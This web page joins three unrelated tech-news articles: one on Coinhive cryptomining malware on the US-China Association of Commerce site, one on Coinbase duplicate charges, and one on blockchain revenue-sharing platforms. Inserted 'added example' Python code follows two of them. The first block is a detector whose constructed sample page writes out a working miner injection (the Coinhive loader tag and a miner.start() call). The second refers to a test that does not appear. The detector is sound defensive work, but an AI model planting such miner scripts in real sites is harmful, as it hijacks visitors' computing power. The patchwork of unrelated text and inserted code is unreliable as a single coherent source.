The US-China Association of Commerce site is running cryptocurrency mining malware
The crypto-jacking malware epidemic is far from over – and it appears the latest victim of this disturbing trend is the website of the US-China Association of Commerce (USCAC).
Security researcher Troy Mursch from Bad Packets Report has found that the USCAC website is infected with a malicious script designed to steal visitors’ computing power to surreptitiously mine cryptocurrency.
For the record, the malicious script found on the USCAC site is more commonly known as Coinhive. This means that whoever sneaked in the script is currently banking on the popular anonymous cryptocurrency Monero.
For safety reasons, we have decided not to link directly to the affected website, as Mursch warns that the page could direct users to “fake tech support scams and other malware downloads.”
The likely reason for this breach is that the USCAC site runs on an outdated version of the Drupal content management system (CMS). Indeed, Mursch emphasizes that the USCAC source code indicates the last time the website got an update was back in December 2011.
For context, USCAC describes itself as a “community of entrepreneurs and professionals” with 300 Western and Chinese members and thousands of business organizations. Its goal is to “enhance friendship and understanding” between the American and the Chinese governments.
“Websites that use outdated versions of Drupal (CMS) are highly vulnerable and can be exploited en masse,” Mursch told Hard Fork. “Unfortunately I’ve found 115,000 Drupal sites that are outdated — some haven’t been updated in many years. So far, we’ve found hundreds of these sites affected by crypto-jacking attacks.”
Indeed, this is not the first government website to feature cryptocurrency mining malware.
Earlier this year, Mursch revealed a list of 400 compromised websites that were similarly running outdated Drupal versions. The list of affected pages included government sites of countries like the US, Mexico, Turkey, Peru, South Africa, and Italy; other notable examples included the sites of Chinese giant Lenovo, Taiwanese hardware maker D-Link, and the University of California, Los Angeles (UCLA).
It is particularly worrying that well-funded institutions like the ones above have failed to adequately update their websites and protect their users against such attacks. But Troy hints that Coinhive might also be partially responsible for the recent outbreak of crypto-jacking malware.
Mursch told Hard Fork that prior to a report he and fellow researcher Brian Krebs published in March, Coinhive used to “let abuse run rampant” on its platform. “They still do, but at least now they can cut a key off,” he added. Disabling a key essentially means no more mining for the Monero user who owns the key. However, Mursch notes that malicious actors can easily request and get a new key – which could turn the affair into a vicious circle.
Mursch told Hard Fork that he has not yet reported the issue to USCAC, pointing out that it is unfeasible for him to contact the operators of all 115,000 affected websites. Instead, he has been collaborating with the Drupal security team and the US Computer Emergency Response Team (CERT) to spread the word.
Mursch’s advice for all website operators using Drupal’s content platform is to update to the latest available version as soon as possible.
While Mursch remains concerned that the crypto-jacking epidemic is here to stay, he advises that there are some measures you can take to protect yourself: you can find out more about this here.
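The infection described above is visible in a page’s own HTML: a loader tag for the Coinhive library followed by a `CoinHive.Anonymous('<site key>')` start call. The scanner below is an added example, not code from the article or from Bad Packets Report; it flags both indicators, pulls out the site key (the value an abuse report to the mining service would need) and also notes the CMS generator tag that Drupal emits, which is how an auditor can tell at a glance which platform is serving the page. The sample page is constructed and the site key in it is a placeholder.

```python
"""Scan fetched HTML for in-browser cryptomining script injection.

Added example (not code from the article or from Bad Packets Report). It
detects the Coinhive loader script and the CoinHive.Anonymous(...) start
call, records the site key for abuse reporting, and reads the generator
<meta> tag that Drupal adds so the CMS in use can be noted for patch review.
SAMPLE_PAGE below is constructed; its site key is a placeholder.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Loader tag: <script src="https://coinhive.com/lib/coinhive.min.js"> and
# the coin-hive.com mirror it was also served from.
MINER_SCRIPT_SRC = re.compile(
    r'<script[^>]+src=["\']([^"\']*coin-?hive[^"\']*)["\']', re.I)
# Miner start call; the captured group is the Coinhive site key.
MINER_START_CALL = re.compile(
    r'CoinHive\.Anonymous\(\s*["\']([^"\']+)["\']', re.I)
# Drupal 7 emits <meta name="Generator" content="Drupal 7 (http://drupal.org)" />
GENERATOR_META = re.compile(
    r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']([^"\']+)["\']', re.I)


@dataclass
class ScanResult:
    miner_scripts: List[str] = field(default_factory=list)
    site_keys: List[str] = field(default_factory=list)
    generator: Optional[str] = None

    @property
    def infected(self) -> bool:
        """Either the loader or the start call is enough to flag the page."""
        return bool(self.miner_scripts or self.site_keys)


def scan_html(html: str) -> ScanResult:
    """Return every miner indicator found in `html`, de-duplicated in order."""
    result = ScanResult()
    for src in MINER_SCRIPT_SRC.findall(html):
        if src not in result.miner_scripts:
            result.miner_scripts.append(src)
    for key in MINER_START_CALL.findall(html):
        if key not in result.site_keys:
            result.site_keys.append(key)
    meta = GENERATOR_META.search(html)
    if meta:
        result.generator = meta.group(1)
    return result


# Constructed sample page; the site key is a placeholder, not a real key.
SAMPLE_PAGE = """<html><head>
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY_PLACEHOLDER');
miner.start();</script>
</head><body><p>Welcome</p></body></html>"""

if __name__ == "__main__":
    found = scan_html(SAMPLE_PAGE)
    print("infected:", found.infected)
    print("loader scripts:", found.miner_scripts)
    print("site keys:", found.site_keys)
    print("generator:", found.generator)
```

Run against saved page sources rather than live fetches, so that a page which also serves scam redirects (as Mursch warns this one may) is never rendered in a browser during triage. The generator tag is only a hint: sites that strip it are not cleared by its absence.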
Coinbase tells overcharged cryptocurrency buyers to contact their banks
It has been more than 10 days since numerous Coinbase users cried out that the popular cryptocurrency exchange desk had erroneously charged them multiple times for past purchases, but it seems the situation is far from over – and customers are still waiting on refunds from Visa and their banks.
Over the weekend, a group of cryptocurrency holders took to Reddit to complain that they are yet to be compensated for purchases they never made – some for as much as 50 times the value of the intended purchase.
“Still have not received refund on [C]oinbase triple charge,” one user wrote on February 25. The poster went on to explain that after being refunded for a wrong purchase that occurred on February 1, the customer was again wrongly charged on February 14. Unfortunately, he has yet to receive a refund for the second mishap.
What is especially concerning is that this is hardly the only complaint.
To this date, it remains unclear who is responsible for this massive blunder – or what precisely caused it. And from the looks of it, things are likely to stay this way.
Shortly after confirming the issue on February 15, Coinbase blamed the multiple charges on Visa. While the financial service giant initially denied any fault, essentially shifting the responsibility back to Coinbase, it eventually released another statement to make it clear that the exchange desk made no mistake.
“This issue was not caused by Coinbase,” the company wrote in a joint statement with payment processing service Worldpay. “Worldpay and Coinbase have been working with Visa and Visa issuing banks to ensure that the duplicate transactions have been reversed and appropriate credits have been posted to cardholder accounts.”
We asked Coinbase to clarify which banks are yet to handle unprocessed refunds, but the exchange desk was unfortunately unable to provide this information. However, according to a statement the company posted on Reddit on February 22, Scotiabank is one of these institutions.
“We are investigating a potential issue for Scotia Bank [sic] customers leading to incorrect charges,” a company spokesperson said. “We believe this to be isolated at this point, and separate from the Worldpay and Visa issue outlined above. We will post an update here as we learn more.”
Browsing through complaints on Reddit, it appears that customers of the Singapore-based United Overseas Bank are facing the same issue.
On the bright side, there is a growing number of users reporting that their banks have successfully reversed the erroneous transfers. US-based Landmark Credit Union Bank has purportedly already begun issuing refunds, according to commenters.
One slightly annoying detail is that wrongly charged users appear to have incurred additional fees for the multiple charges. Speaking to Coinbase over the phone, the exchange desk vehemently insisted that banks are responsible for any unexpected fees resulting from wrongful charging. There is no mention of whether overdraft fees incurred due to this inconvenience will be refunded – or who is responsible for such expenses.
A spokesperson for Coinbase further told TNW that any impacted users still waiting to receive refunds ought to get in touch with their customer support team, so they can give them further directions on how they can contact their banks and claim their cash back.
In the meantime, we would like to encourage affected users (who are yet to receive refunds) to contact us with details about their card-issuing banks. We are trying to compile a list of banks that are yet to reverse the inaccurate charges. Please get in touch at [email protected]
Even though blockchain and cryptocurrency might not be perfect yet, we’re exploring the possibilities at TNW Conference 2018. Find more info here.
Blockchain can lead to less greedy companies — seriously
A new wave of companies is coming which will view the sharing of revenue with their users as a natural part of doing business. This vision is fixed in code, written down in smart contracts on a blockchain protocol. These contracts automatically secure and execute the vision and the operation of the company. I believe that in due time, these companies could sprout new economic models, empowered by this tech and a vision for a fairer world.
Although the dominant platforms Facebook, Youtube, Google, and Instagram keep increasing in size, a clear negative shift in sentiment is unfolding towards them, rightly fueled by scandals and new expectations.
The way I see it, if consumers want change — and companies with the right vision and the right technology tap into this — we could be seeing a new wave of companies having success with a more open and fairer model.
Uneven distribution of wealth and the changing zeitgeist
Currently large tech platforms like Facebook, Youtube, Google, and Instagram take the lion’s share of the market when it comes to revenue generated from advertising, search, and content. Most of the users of these services receive little to no value in return for their contribution. You could say content in return for likes, views, and dopamine hits.
Based on estimates, Youtube generated $12 billion in revenue in 2016. Only the really large Youtube stars get a tiny fraction of this amount. Recently Youtube raised the limit for the number of views you need before you get to share in the advertising revenue. One can’t help but wonder if this is an honest model.
Besides an unbalanced reward system, I also see a seismic shift happening in the sentiment people have towards the big tech platforms. They are experiencing a push-back from governments. Multiple former Facebook executives have publicly stated that they created a tool that is “ripping apart the social fabric of how society works.”
Recently #DeleteFacebook became trending after several call-outs by influential people. This does not have an immediate effect on the companies, but will change the public’s perception of them, which in turn creates room for new companies with a different mindset.
Besides, there is a growing demand from consumers, especially millennials, who would like large corporates to contribute to society. 91 percent of millennials would even switch brands for those that are associated with a good cause. This sounds like music to my ears. Could this also mean that there is room for companies who do good for their own users as well? Is it finally time for new models?
New platforms and new models
First steps have been taken by several new video platforms like Flixxo and View.ly to try out new models. I’m not here to endorse them or to tell you that they’re the absolute right way to go — but what they have done is show a possible way away from the greed of the current tech giants. They reward users with tokens for watching, sharing, or uploading content. You are being paid to use and participate in the platform.
Flixxo goes even further by leveraging their users’ bandwidth for the distribution of the video content by means of BitTorrent technology, which you get paid for, of course.
Advertisers can buy tokens directly from specific channels they want to advertise on. Users who have no tokens can consume content by watching these ads.
Smart contracts for an automated distribution of wealth
As a contributor to the service you can decide how many tokens you want to earn for your content. All of this is automatically handled by smart contracts. Thanks to this setup, it’s even possible to decide how to split revenue between your production partners — after checking for copyright issues, the network validates the payout within 7 days.
No intermediary party is needed anymore. The rules in the smart contract operate the company, and after agreement these rules are no longer adjustable. This automates the operation of the company and reduces costs, leaving more to share with the users.
It’s imaginable that people would prefer a platform where they get paid for their contribution. The idea that blockchain and smart contracts can facilitate a new generation of companies is completely feasible; technically it’s already possible.
That this can create new economic models is, besides a beautiful thought, maybe also something that can become a reality. I wanted to investigate and validate whether I was alone in this thinking.
I was fortunate enough to have a chat about this with Joseph Lubin, the co-founder of the second largest cryptocurrency and largest smart contract platform, Ethereum. During a roundtable discussion at SXSW, he shared my view of new companies arising which are wired differently from the ground up, with sharing at their core.
Will this really work?
Companies like Flixxo and View.ly are currently in an alpha phase and still have to prove themselves. If you look at a platform like Steemit you can see the first signs of new models starting to work. Users pay each other for posting, sharing, and commenting on its message board. Payments are done through their own token model, the Steem dollar. Steemit has already been running for several years and is growing in size.
The challenge for companies like Flixxo and View.ly could lie in the fact that they use ERC20-style tokens. These currently take around 10 minutes to transfer and consume some gas for the transaction. Millions of transactions could clog the system, like what happened with Cryptokitties.
To counter this, Flixxo is starting out with combining centralized and distributed methods for the usage of tokens. In the beginning blockchain will only be used for deposits and withdrawals of tokens. As blockchain becomes more scalable and the technology improves, the entire process can be moved to the blockchain. They are working with RSK to set up such technology.
In the case of View.ly, publishers need tokens to publish and token holders can vote on quality content, similar to Steemit. Votes are broadcast on a p2p network through the Whisper protocol, so everybody can validate them — this is all off-chain communication. At the end of a distribution period, which is currently seven days, votes are aggregated and tokens are issued as rewards for participation; this is done on-chain.
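The two mechanisms described in this article, a fixed revenue split between a creator and their production partners that is settled by the contract rules (the “Smart contracts for an automated distribution of wealth” section) and a distribution period in which off-chain votes are aggregated and tokens issued on-chain (View.ly above), can be modelled together. The following is an added example, not the code of View.ly, Flixxo or Steemit: it treats tokens as integer units the way on-chain balances are, validates that a split sums to exactly 100% before any payout, ignores duplicate votes that a gossip network may deliver twice, and assigns the rounding remainder deterministically so that every unit of the period reward is accounted for. The votes, splits and reward figure are constructed sample data.

```python
"""Model of one token distribution period with contract-fixed revenue splits.

Added example, not the code of View.ly, Flixxo or Steemit. Off-chain votes
are aggregated per content item, a fixed period reward is issued in
proportion to votes, and each item's payout is split among its production
partners by pre-agreed basis points. Amounts are integers (smallest token
unit) to mirror on-chain arithmetic; floor-division leftovers are assigned
deterministically rather than lost. All sample data below is constructed.
"""
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

BASIS_POINTS = 10_000  # 100% expressed as basis points, as many contracts do


def validate_split(split: Dict[str, int]) -> None:
    """Reject a partner split that is negative or does not sum to exactly 100%.
    A contract that skipped this check could mint more (or less) than it pays."""
    if any(bp < 0 for bp in split.values()):
        raise ValueError("negative share in split")
    if sum(split.values()) != BASIS_POINTS:
        raise ValueError("shares must sum to %d basis points" % BASIS_POINTS)


def proportional_split(total: int, weights: Dict[str, int]) -> Dict[str, int]:
    """Divide `total` units by integer `weights`. Floor division leaves a
    remainder of at most len(weights)-1 units; it goes to the highest-weighted
    key (ties broken by name) so the result is deterministic and sums to `total`."""
    weight_sum = sum(weights.values())
    if weight_sum <= 0:
        return {k: 0 for k in weights}
    out = {k: total * w // weight_sum for k, w in weights.items()}
    remainder = total - sum(out.values())
    if remainder:
        top = sorted(weights, key=lambda k: (-weights[k], k))[0]
        out[top] += remainder
    return out


def aggregate_votes(votes: List[Tuple[str, str]]) -> Dict[str, int]:
    """Count one vote per (voter, content) pair. The same vote seen twice on
    the gossip network must not count twice."""
    return dict(Counter(content for _voter, content in set(votes)))


def settle_period(votes: List[Tuple[str, str]], period_reward: int,
                  splits: Dict[str, Dict[str, int]]):
    """Aggregate votes, allocate the period reward per content item, then pay
    each item's partners by its fixed split. Returns (tally, per_content, payouts)."""
    tally = aggregate_votes(votes)
    per_content = proportional_split(period_reward, tally)
    payouts: Dict[str, int] = defaultdict(int)
    for content, amount in per_content.items():
        split = splits[content]
        validate_split(split)  # checked before any payout for this item
        for partner, share in proportional_split(amount, split).items():
            payouts[partner] += share
    return tally, per_content, dict(payouts)


# Constructed sample data: ("bob", "video-A") arrives twice from the network.
VOTES = [("alice", "video-A"), ("bob", "video-A"),
         ("carol", "video-B"), ("bob", "video-A")]
SPLITS = {
    "video-A": {"studio": 7000, "editor": 3000},  # 70% / 30%, fixed up front
    "video-B": {"solo": 10000},                    # single creator keeps 100%
}
PERIOD_REWARD = 1000  # units issued for this seven-day period

if __name__ == "__main__":
    tally, per_content, payouts = settle_period(VOTES, PERIOD_REWARD, SPLITS)
    print("votes:", tally)
    print("per content:", per_content)
    print("payouts:", payouts, "total:", sum(payouts.values()))
```

With the sample data, video-A receives 667 of the 1000 units (two of three valid votes plus the one-unit remainder) and video-B 333; the studio/editor split of 667 then yields 467 and 200. The invariant to watch in any such contract is the one the test below checks: the payouts sum to exactly the reward that was minted.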
When speaking to the developers it seems to be an ongoing process of improvement while at the same time, many smart developers are working on improving the Ethereum blockchain through sharding and state channels.
For these new companies it’s of course really difficult to win against the large platforms, due to their lack of scale and lack of money. But the current platforms are built on different business models, most of the time based on advertising revenue. For them it’s difficult to switch to new, more open business models.
If fairer models will become a reality, when can we expect these?
You do have to be patient. If you look at the above phases you can envision a time-frame. Currently we are only in phase 3, where companies try to build somewhat usable consumer facing wallets where people can store their digital currencies. But it’s still early days.
However, the technology, the vision, the companies, and the timing seem to be getting more and more aligned for companies to run an open and transparent system where they share with their users. If I had to make an estimate, maybe this new wave of tech and corresponding companies will be common in the next 5-10 years.
It’s also up to us, the ones building, envisioning, and pushing technology forward. Let’s try to use technology to empower visions for a better world instead of just more greed.